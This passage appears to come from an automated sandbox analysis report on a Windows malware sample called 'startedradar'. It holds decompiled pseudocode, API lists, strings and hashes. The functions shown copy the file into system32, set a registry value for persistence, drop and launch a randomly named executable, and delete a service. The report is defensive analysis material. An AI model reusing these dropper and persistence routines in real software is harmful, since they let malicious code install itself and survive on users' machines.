				 *((intOrPtr*)(_t163 - 0xd4)) = 0x26c6e81f;
				 *((intOrPtr*)(_t163 - 0xd0)) = 0x8c35f216;
				 *((intOrPtr*)(_t163 - 0xcc)) = 0xc57f604d;
				 *((intOrPtr*)(_t163 - 0xc8)) = 0xc680fd1c;
				 *((intOrPtr*)(_t163 - 0xc4)) = 0x2d8c26d6;
				 *((intOrPtr*)(_t163 - 0xc0)) = 0xa880798f;
				 *((intOrPtr*)(_t163 - 0xbc)) = 0x2b922658;
				 *((intOrPtr*)(_t163 - 0xb8)) = 0xea5892d;
				 *((intOrPtr*)(_t163 - 0xb4)) = 0x7097e74b;
				 *((intOrPtr*)(_t163 - 0xb0)) = 0x9e4287c3;
				 *((intOrPtr*)(_t163 - 0xac)) = 0x7ddd092d;
				 *((intOrPtr*)(_t163 - 0xa8)) = 0x9d72876c;
				 *((intOrPtr*)(_t163 - 0xa4)) = 0x687954f0;
				 *((intOrPtr*)(_t163 - 0xa0)) = 0xdc560dfd;
				 *((intOrPtr*)(_t163 - 0x9c)) = 0xc6ae8e76;
				 *((intOrPtr*)(_t163 - 0x98)) = 0x8b8a62f4;
				 *((intOrPtr*)(_t163 - 0x94)) = 0xecb223eb;
				 *((intOrPtr*)(_t163 - 0x90)) = 0x47121692;
				 *((intOrPtr*)(_t163 - 0x8c)) = 0xae2ee0d3;
				 *((intOrPtr*)(_t163 - 0x88)) = 0x4d4e6b59;
				 *((intOrPtr*)(_t163 - 0x84)) = 0x946b4306;
				 *((intOrPtr*)(_t163 - 0x80)) = 0xd476e44b;
				 *((intOrPtr*)(_t163 - 0x7c)) = 0x18a3fb60;
				 *((intOrPtr*)(_t163 - 0x78)) = 0xd6ef19a3;
				 *((intOrPtr*)(_t163 - 0x74)) = 0x15abf441;
				 *((intOrPtr*)(_t163 - 0x70)) = 0xdec4d0c9;
				 *((intOrPtr*)(_t163 - 0x6c)) = 0xd9403070;
				 *((intOrPtr*)(_t163 - 0x68)) = 0x8e8082e4;
				 *((intOrPtr*)(_t163 - 0x64)) = 0x26487421;
				 *((intOrPtr*)(_t163 - 0x60)) = 0x28c9a878;
				 *((intOrPtr*)(_t163 - 0x5c)) = 0x17178755;
				 *((intOrPtr*)(_t163 - 0x58)) = 0xfdb97c74;
				 *((intOrPtr*)(_t163 - 0x54)) = 0x54f28a82;
				 *((intOrPtr*)(_t163 - 0x50)) = 0x84c7bbdf;
				 *((intOrPtr*)(_t163 - 0x4c)) = 0x16f91cc5;
				 *((intOrPtr*)(_t163 - 0x48)) = 0x744cd88f;
				 *((intOrPtr*)(_t163 - 0x44)) = 0x1b61a938;
				 *((intOrPtr*)(_t163 - 0x40)) = 0x4115c6b9;
				 *((intOrPtr*)(_t163 - 0x3c)) = 0x267599c8;
				 *((intOrPtr*)(_t163 - 0x38)) = 0x648ba3c;
				 *((intOrPtr*)(_t163 - 0x34)) = 0xecb540f7;
				 *((intOrPtr*)(_t163 - 0x30)) = 0x89b84a5;
				 *((intOrPtr*)(_t163 - 0x2c)) = 0xb9e63541;
				 *((intOrPtr*)(_t163 - 0x28)) = 0xa1eb4040;
				 *((intOrPtr*)(_t163 - 0x24)) = 0xac5c6894;
				 *((intOrPtr*)(_t163 - 0x20)) = 0x15e21cd3;
				 *((intOrPtr*)(_t163 - 0x1c)) = 0x8a75a34c;
				 *((intOrPtr*)(_t163 - 0x18)) = 0xeec71677;
				 *((intOrPtr*)(_t163 - 0x14)) = 0x86e6e5b0;
				 *((intOrPtr*)(_t163 - 0x10)) = 0xe0065bd7;
				 *((intOrPtr*)(_t163 - 0xc)) = 0x831cc3a0;
				 *((intOrPtr*)(_t163 - 8)) = 0xdfe1953e;
				 *((intOrPtr*)(_t163 - 4)) = 0x6b032933;
				_t161 = L00111D00(0x122ef0, 0x1ac, _t159);
				 *0x127c74 = LoadLibraryW(_t161);
				_t152 = HeapFree(GetProcessHeap(), 0, _t161);
				_t156 =  *0x127c74; // 0x77740000
				_t162 = 0x1f5c6a;
				if(_t156 != 0) {
					goto 0x30167d;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t154, _t156, _t163 - 0x24c, _t159, _t162);
				} else {
					goto 0x30166a;
					return _t152;
				}
			}

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00117122
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00117130
HeapFree.KERNEL32(00000000), ref: 00117137

Strings

d4, xrefs: 00116E8E
{gB, xrefs: 00116F0B
YkNM, xrefs: 00117023
91\_, xrefs: 00116EB6
!tH&, xrefs: 00117068

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: !tH&$91\_$YkNM$d4${gB
API String ID: 872250060-3240151467
Opcode ID: 1d95f28263a5c16d582355abba4a0dfae73285b5ea249457703acb6a55007ef2
Instruction ID: 712b095000c6b9f5f2fe8f9abd55f79f5c7f19e5dd1a60872e5cd951b5b6acd0
Opcode Fuzzy Hash: 1d95f28263a5c16d582355abba4a0dfae73285b5ea249457703acb6a55007ef2
Instruction Fuzzy Hash: 29C195B4C463ADDFDB619F929A947DDBA31BB15300F6082C8D6593B314CB750A82CF86

Uniqueness

Uniqueness Score: 100.00%

Function 0011F71E, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 22memoryUNIQUE

APIs

memset.NTDLL ref: 0011F720
_snwprintf.NTDLL ref: 0011F751
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F75D
HeapFree.KERNEL32(00000000), ref: 0011F764

Strings

C:\Windows\system32\startedradar.exe, xrefs: 0011F74C
startedradar, xrefs: 0011F73A
C:\Windows\system32, xrefs: 0011F73F

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess_snwprintfmemset
String ID: C:\Windows\system32$C:\Windows\system32\startedradar.exe$startedradar
API String ID: 3735989449-1204595223
Opcode ID: 9596d8ee6f89deb860cc1a8c784958f16586f2e62b5c5399683c0784e580b417
Instruction ID: 5636ceef5cb6c1f43f3637c9f63d5bfec67bc0455de77c38df4d4bb1780fd9f7
Opcode Fuzzy Hash: 9596d8ee6f89deb860cc1a8c784958f16586f2e62b5c5399683c0784e580b417
Instruction Fuzzy Hash: 53E0C230249320BBEB2027E27C8EB9F3906DB047B7F110410FA06699C1CBB108F283A2

Uniqueness

Uniqueness Score: 100.00%

Function 001124E9, Relevance: 12.1, APIs: 8, Instructions: 59
memorystringCOMMON

C-Code - Quality: 30%

			E001124E9(void* __ebx, int __edi, intOrPtr* __esi) {
				int _t20;
				short* _t23;
				void* _t24;
				void* _t39;
				void* _t42;
				void* _t43;
				long* _t44;
				int _t46;
				signed int _t48;
				intOrPtr* _t49;
				void* _t51;
				long _t52;
				WCHAR* _t54;
				void* _t55;

				_t49 = __esi;
				_t46 = __edi;
				_t39 = __ebx;
				do {
					_t1 = _t49 + 4; // 0x4
					_t20 = lstrlenW(_t1);
					_t49 =  *_t49;
					_t39 = _t39 + 1 + _t20;
				} while (_t49 != 0);
				_t23 = RtlAllocateHeap(GetProcessHeap(), 8, _t39 + _t39);
				 *(_t55 - 4) = _t23;
				if(_t23 == 0) {
					_t46 =  *(_t55 - 0xc);
				} else {
					_t42 =  *(_t55 - 8);
					while(_t42 != 0) {
						_t5 = _t42 + 4; // 0x4
						_t54 = _t5;
						lstrcpyW( &(_t23[_t46]), _t54);
						_t48 = _t46 + lstrlenW(_t54);
						_t23 =  *(_t55 - 4);
						_t23[_t48] = 0x2c;
						_t46 = _t48 + 1;
						_t42 =  *_t42;
					}
					_t43 = 0;
					_t52 = WideCharToMultiByte(0xfde9, 0, _t23, _t46, 0, 0, 0, 0);
					 *(_t55 - 0x14) = _t52;
					if(_t52 != 0) {
						_t43 = RtlAllocateHeap(GetProcessHeap(), 8, _t52);
						if(_t43 == 0) {
							goto L10;
						} else {
							goto 0x300916;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							WideCharToMultiByte();
							_t44 =  *(_t55 - 0x10);
							if(_t44 != 0) {
								 *_t44 =  *(_t55 - 0x14);
							}
						}
					}
					goto 0x300936;
					asm("int3");
					 *_t46 = _t43;
					HeapFree(GetProcessHeap(), ??, ??);
				}
				_t24 =  *(_t55 - 8);
				if(_t24 != 0) {
					do {
						_t51 =  *_t24;
						HeapFree(GetProcessHeap(), 0, _t24);
						_t24 = _t51;
					} while (_t51 != 0);
				}
				return 0 |  *_t46 != 0x00000000;
			}

APIs

lstrlenW.KERNEL32(00000004), ref: 001124F4
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00112509
RtlAllocateHeap.NTDLL(00000000), ref: 00112510
lstrcpyW.KERNEL32(00000000,00000004), ref: 00112530
lstrlenW.KERNEL32(00000004), ref: 00112537
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00112560
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00112572
RtlAllocateHeap.NTDLL(00000000), ref: 00112579
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001125D5
HeapFree.KERNEL32(00000000), ref: 001125DC

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$Process$Allocatelstrlen$ByteCharFreeMultiWidelstrcpy
String ID:
API String ID: 3825671978-0
Opcode ID: 6c3865eb041cb2c6d8c73084539f38a1a1672f12107941c4332596bdce561cc1
Instruction ID: ecb848dd8fe435102503e1bd16fec2c49ffd46fad11fb6146dff9b149f7eebc1
Opcode Fuzzy Hash: 6c3865eb041cb2c6d8c73084539f38a1a1672f12107941c4332596bdce561cc1
Instruction Fuzzy Hash: 09113671901715EFEB709FE4DCD8EAA77ADEF08748B040424FA01D7650DB709EA68BA1

Uniqueness

Uniqueness Score: 1.85%

Function 0012000F, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47stringfileCOMMON

APIs

lstrcpyW.KERNEL32 ref: 0012001D
lstrlenW.KERNEL32(?), ref: 0012002A
GetTickCount.KERNEL32 ref: 00120040
CreateFileW.KERNEL32(0065002E,40000000), ref: 00120099

Strings

., xrefs: 0012006F
x, xrefs: 0012007A

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CountCreateFileTicklstrcpylstrlen
String ID: .$x
API String ID: 3921185036-1654958672
Opcode ID: 36edc7f65f96636ef61b8a0890f690609b76ad92ce23c0f2ab860107847d1c92
Instruction ID: 3d6c23781d7e7d1a6f494745f16426dced493494f8b713427d80048488544e06
Opcode Fuzzy Hash: 36edc7f65f96636ef61b8a0890f690609b76ad92ce23c0f2ab860107847d1c92
Instruction Fuzzy Hash: 3301F771904609AFD760CF60DC8CBAE3669EF04354F204365E90AD7AA0DF31CD96CB80

Uniqueness

Uniqueness Score: 3.75%

Function 00120372, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45filestringCOMMON

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000), ref: 00120384
lstrlenW.KERNEL32(?), ref: 00120391
GetTickCount.KERNEL32 ref: 001203A7
CreateFileW.KERNEL32(0065002E,40000000,00000000,00000000), ref: 00120408

Strings

., xrefs: 001203D4
x, xrefs: 001203E1

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CountCreateFileFolderPathTicklstrlen
String ID: .$x
API String ID: 2156814356-1654958672
Opcode ID: 7d71e2e5785ddf114e5a846d37b6da4311243fb375cc8ea0f8c43470f7cec3fe
Instruction ID: 2bce9a8ae5f164271c230d323f9bcd92471a01bd49e2a21b09acefb3119d506a
Opcode Fuzzy Hash: 7d71e2e5785ddf114e5a846d37b6da4311243fb375cc8ea0f8c43470f7cec3fe
Instruction Fuzzy Hash: E9119671A40718BBEB208FA0EC8DF9A3761BB08714F1441A4EA09EF6D1DB74DA458FC4

Uniqueness

Uniqueness Score: 3.75%

Function 00120242, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
filestringCOMMON

C-Code - Quality: 23%

			E00120242(void* __eax, void* __ecx) {
				int _t36;
				int _t37;
				void* _t43;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				void* _t51;
				void* _t54;
				void* _t57;

				_t43 = __ecx;
				 *0x125a94(0, 0x23, 0, 0, __eax);
				_t48 = lstrlenW(_t57 - 0x268);
				 *((short*)(_t57 + _t48 * 2 - 0x268)) = 0x5c;
				_t49 = _t48 + 1;
				_t54 = (GetTickCount() & 0x0000000f) + 4;
				L00111FD0( &((_t57 - 0x268)[_t49]), _t54);
				_t50 = _t49 + _t54;
				 *((intOrPtr*)(_t57 + _t50 * 2 - 0x268)) = 0x65002e;
				 *((intOrPtr*)(_t57 + _t50 * 2 - 0x264)) = 0x650078;
				 *((short*)(_t57 + _t50 * 2 - 0x260)) = 0;
				 *((intOrPtr*)(_t57 - 4)) =  *((intOrPtr*)(_t43 + 4));
				_t36 = CreateFileW(_t57 - 0x268, 0x40000000, 0, 0, 2, 0x80, 0);
				_t51 = _t36;
				if(_t51 != 0xffffffff) {
					goto 0x302019;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t37 = WriteFile();
					_t36 = CloseHandle(_t51);
					if(_t37 != 0) {
						goto 0x302032;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						 *(_t57 - 0x60) = 0x44;
						_t36 = CreateProcessW(_t57 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t57 - 0x60, _t57 - 0x14);
						if(_t36 != 0) {
							CloseHandle( *(_t57 - 0x14));
							_t36 = CloseHandle( *(_t57 - 0x10));
						}
					}
				}
				goto 0x302048;
				asm("int3");
				return _t36;
			}

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000), ref: 0012024D
lstrlenW.KERNEL32(?), ref: 0012025A
GetTickCount.KERNEL32 ref: 00120270
CreateFileW.KERNEL32(0065002E,40000000,00000000,00000000), ref: 001202D1

Strings

x, xrefs: 001202AA
., xrefs: 0012029D

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CountCreateFileFolderPathTicklstrlen
String ID: .$x
API String ID: 2156814356-1654958672
Opcode ID: 2058ca7433a8932f85259d85c6659f272112acdef57b1513daa5025f4e0048d8
Instruction ID: 25cd32f413a97fa30df077d4b16d1fc38b5956dc0301aec43052157eb2c92095
Opcode Fuzzy Hash: 2058ca7433a8932f85259d85c6659f272112acdef57b1513daa5025f4e0048d8
Instruction Fuzzy Hash: 6201B971644719ABE7208F60DC4DB5A3661FB04711F1443A4EA09DF6D0DB719D45CB84

Uniqueness

Uniqueness Score: 3.75%

Function 0012018C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39
registrymemoryCOMMON

C-Code - Quality: 68%

			E0012018C(signed int __edi, void* __esi, void* __eflags) {
				int _t11;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t23;

				asm("popfd");
				asm("int3");
				_t21 = L00111D00(_t16, _t17, __edi);
				if(RegCreateKeyExW(0x80000001, _t21, 0, 0, 0, 2, 0, _t23 - 4, 0) == 0) {
					RegSetValueExW( *(_t23 - 4), "startedradar", 0, 1, _t23 - 0x20c, 2 + __edi * 2);
					RegCloseKey( *(_t23 - 4));
				}
				_t11 = HeapFree(GetProcessHeap(), 0, _t21);
				return _t11;
			}

0x0012018c
0x0012018d
0x00120196
0x001201b6
0x001201d3
0x001201dc
0x001201dc
0x001201ec
0x001201f7

APIs

RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 001201AE
RegSetValueExW.ADVAPI32(?,startedradar,00000000,00000001,?,00000000), ref: 001201D3
RegCloseKey.ADVAPI32(?), ref: 001201DC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001201E5
HeapFree.KERNEL32(00000000), ref: 001201EC

Strings

startedradar, xrefs: 001201CB

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$CloseCreateFreeProcessValue
String ID: startedradar
API String ID: 3386933116-1774226336
Opcode ID: 5af0d34fa31f79009bb18b12355081e119640cd1ed60305c20e77b59a6c00281
Instruction ID: 93883f40a664a5a26fe3eee21fe84de7cde9765b6a8b263e67cf2a1b44b3f451
Opcode Fuzzy Hash: 5af0d34fa31f79009bb18b12355081e119640cd1ed60305c20e77b59a6c00281
Instruction Fuzzy Hash: 59F09072680218BBEB309B90AC0FFDE3728EB04752F200161F706A98D1D7A19AA18795

Uniqueness

Uniqueness Score: 7.75%

Function 001110C3, Relevance: 10.5, APIs: 7, Instructions: 36memoryUNIQUE

APIs

_snwprintf.NTDLL ref: 001110E2
GetProcessHeap.KERNEL32(?,00000000), ref: 001110ED
HeapFree.KERNEL32(00000000,?,00000000), ref: 001110F4
CreateEventW.KERNEL32(?,00000001,?,?,?,00000000), ref: 00111105
SetEvent.KERNEL32(00000000,?,00000001,?,?,?,00000000), ref: 00111112
CloseHandle.KERNEL32(00000000), ref: 00111119
CloseHandle.KERNEL32(00000000), ref: 00111125

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseEventHandleHeap$CreateFreeProcess_snwprintf
String ID:
API String ID: 1176111436-0
Opcode ID: 7910b78a129cbdf9637a78048cca618dba317ce63553b53f54809b350fce21a9
Instruction ID: 23f6660446a14d9bd3a80774be6711a49fc4e4c6c577e0bb9706d5959683b59d
Opcode Fuzzy Hash: 7910b78a129cbdf9637a78048cca618dba317ce63553b53f54809b350fce21a9
Instruction Fuzzy Hash: D6F0F6B2801514FBCB325BB09C4CFEF7A3DEF45701F000455FA09A2651DB3489E28B65

Uniqueness

Uniqueness Score: 23.02%

Function 0011FF8F, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 23
processUNIQUE

C-Code - Quality: 33%

			E0011FF8F() {
				int _t9;
				void* _t11;

				memset();
				 *(_t11 - 0x58) = 0x44;
				_t9 = CreateProcessW("C:\Windows\system32\startedradar.exe", 0, 0, 0, 0, 0, 0, 0, _t11 - 0x58, _t11 - 0x10);
				if(_t9 != 0) {
					CloseHandle( *(_t11 - 0x10));
					_t9 = CloseHandle( *(_t11 - 0xc));
				}
				goto 0x301ef4;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				return _t9;
			}

0x0011ff8f
0x0011ff98
0x0011ffba
0x0011ffc2
0x0011ffc7
0x0011ffd0
0x0011ffd0
0x0011ffd6
0x0011ffdb
0x0011ffdc
0x0011ffdd
0x0011ffde
0x0011ffdf

APIs

memset.NTDLL ref: 0011FF8F
CreateProcessW.KERNEL32(C:\Windows\system32\startedradar.exe,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0011FFBA
CloseHandle.KERNEL32(?), ref: 0011FFC7
CloseHandle.KERNEL32(?), ref: 0011FFD0

Strings

C:\Windows\system32\startedradar.exe, xrefs: 0011FFB5
D, xrefs: 0011FF98

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: C:\Windows\system32\startedradar.exe$D
API String ID: 657545203-196031280
Opcode ID: 01e13dd04f288d070de82ba81ae05b30cd16803c8dae89a99b9f20ee940dc91f
Instruction ID: 4385d4095bfe4496c1798f73b31808ad3eb796f7557341cc4b5d9a56a317cffe
Opcode Fuzzy Hash: 01e13dd04f288d070de82ba81ae05b30cd16803c8dae89a99b9f20ee940dc91f
Instruction Fuzzy Hash: 8DE0EC72904149FFDB219FD0EC48BEE7F79BB00745F104829E612A58A0D77049E6CF25

Uniqueness

Uniqueness Score: 100.00%

Function 0011F69E, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 20
memoryUNIQUE

C-Code - Quality: 50%

			E0011F69E(void* __esi) {
				void* _t2;
				void* _t8;
				void* _t10;

				 *0x125a94();
				_t2 = L00111D00(0x124660, 0x1cc, _t8);
				_t10 = _t2;
				 *0x1259dc("C:\Windows\system32", 0x104, _t10, "C:\Windows\system32", "startedradar", 0x67165621);
				return HeapFree(GetProcessHeap(), 0, _t10);
			}

0x0011f69e
0x0011f6b3
0x0011f6c2
0x0011f6cf
0x0011f6e9

APIs

SHGetFolderPathW.SHELL32 ref: 0011F69E
_snwprintf.NTDLL ref: 0011F6CF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F6DB
HeapFree.KERNEL32(00000000), ref: 0011F6E2

Strings

startedradar, xrefs: 0011F6B8
C:\Windows\system32, xrefs: 0011F6BD, 0011F6CA

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FolderFreePathProcess_snwprintf
String ID: C:\Windows\system32$startedradar
API String ID: 165911164-1721908697
Opcode ID: 622abf17508626e09f473e1437feb5d1a81fc487d0916cec07ec2ffb3978254b
Instruction ID: b8042e963c0a5c5384d1b63ab48ab1ff9ab7b72617cd4cde24e4dbba1fbd10ae
Opcode Fuzzy Hash: 622abf17508626e09f473e1437feb5d1a81fc487d0916cec07ec2ffb3978254b
Instruction Fuzzy Hash: 66E01231686720BBD72027A47D8EF9A3915EB657A3F004050F605599D2CBB108F287A5

Uniqueness

Uniqueness Score: 100.00%

Function 0011FD10, Relevance: 9.0, APIs: 6, Instructions: 37
servicememoryUNIQUE

C-Code - Quality: 65%

			E0011FD10(void* __ecx, void* __esi, void* __eflags) {
				void* _t3;
				void* _t9;
				int _t10;
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t20;
				void* _t23;

				_t16 = __ecx;
				_t3 = L00111D00(0x123d20, _t15, __ecx);
				_t20 = _t3;
				 *0x1259dc(_t23 - 0x208, 0x104, _t20,  *0x12610c, 0x67165621);
				HeapFree(GetProcessHeap(), 0, _t20);
				_t9 = OpenServiceW(_t16, _t23 - 0x208, 0x10000);
				_t17 = _t9;
				if(_t17 == 0) {
					goto 0x301e1d;
					asm("int3");
					asm("int3");
					return _t9;
				} else {
					_t10 = DeleteService(_t17);
					CloseServiceHandle(_t17);
					return _t10;
				}
			}

0x0011fd10
0x0011fd1c
0x0011fd27
0x0011fd36
0x0011fd49
0x0011fd5c
0x0011fd62
0x0011fd66
0x0011fd80
0x0011fd85
0x0011fd86
0x0011fd87
0x0011fd68
0x0011fd69
0x0011fd72
0x0011fd7f
0x0011fd7f

APIs

_snwprintf.NTDLL ref: 0011FD36
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011FD42
HeapFree.KERNEL32(00000000), ref: 0011FD49
OpenServiceW.ADVAPI32(?,?,00010000), ref: 0011FD5C
DeleteService.ADVAPI32(00000000,?,?,00010000), ref: 0011FD69
CloseServiceHandle.ADVAPI32(00000000,?,?,00010000), ref: 0011FD72

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Service$Heap$CloseDeleteFreeHandleOpenProcess_snwprintf
String ID:
API String ID: 4257195289-0
Opcode ID: 34c90138a8c25711ebfc768c37fc8222848150a14f6cba0d2c6b3eebf00fcde3
Instruction ID: f35c66ee33c29941af34a763d769c0eda96d6858885d8f62bee5a52901d28d8f
Opcode Fuzzy Hash: 34c90138a8c25711ebfc768c37fc8222848150a14f6cba0d2c6b3eebf00fcde3
Instruction Fuzzy Hash: 58F09032501214B7CB2157E8AC4CAEEB66DEB4C762F010166FA0AD2561DF7188F28BA1

Uniqueness

Uniqueness Score: 100.00%

Function 00120487, Relevance: 9.0, APIs: 6, Instructions: 33
memoryCOMMON

C-Code - Quality: 37%

			E00120487(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t17;
				void* _t20;
				void* _t25;
				void* _t26;

				_t20 = __ecx;
				asm("popfd");
				asm("int3");
				_t25 = L00111D00(__ecx, __edx, __edi);
				 *0x1259dc(_t26 - 0x428, 0x104, _t25, _t26 - 0x220);
				HeapFree(GetProcessHeap(), 0, _t25);
				_push(_t26 - 0x18);
				_push( *(_t26 - 8));
				_push(_t20);
				if(L00111F00(_t26 - 0x428) != 0) {
					CloseHandle( *(_t26 - 0x18));
					CloseHandle( *(_t26 - 0x14));
				}
				_t17 = CloseHandle( *(_t26 - 8));
				goto 0x3020e5;
				asm("int3");
				return _t17;
			}

0x00120487
0x00120487
0x00120488
0x0012048e
0x001204a4
0x001204b7
0x001204c0
0x001204c1
0x001204ca
0x001204d5
0x001204da
0x001204e3
0x001204e3
0x001204ec
0x001204f2
0x001204f7
0x001204f8

APIs

_snwprintf.NTDLL ref: 001204A4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001204B0
HeapFree.KERNEL32(00000000), ref: 001204B7
CloseHandle.KERNEL32(?), ref: 001204DA
CloseHandle.KERNEL32(?), ref: 001204E3
CloseHandle.KERNEL32(?), ref: 001204EC

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandle$Heap$FreeProcess_snwprintf
String ID:
API String ID: 3500179031-0
Opcode ID: 94e7d5bca64c12230613c99fedc67f8c18b937e425a54096b6515977e96f54b8
Instruction ID: 393d90b34c3339b0ae373a5abf93915138d104d863a51356a4515a33b877824d
Opcode Fuzzy Hash: 94e7d5bca64c12230613c99fedc67f8c18b937e425a54096b6515977e96f54b8
Instruction Fuzzy Hash: 5CF0FFB2801119FBCF216BE0EC49EEE7F39AF04346F004851F605A5461D7318AE5CFA0

Uniqueness

Uniqueness Score: 4.01%

Function 001111F3, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

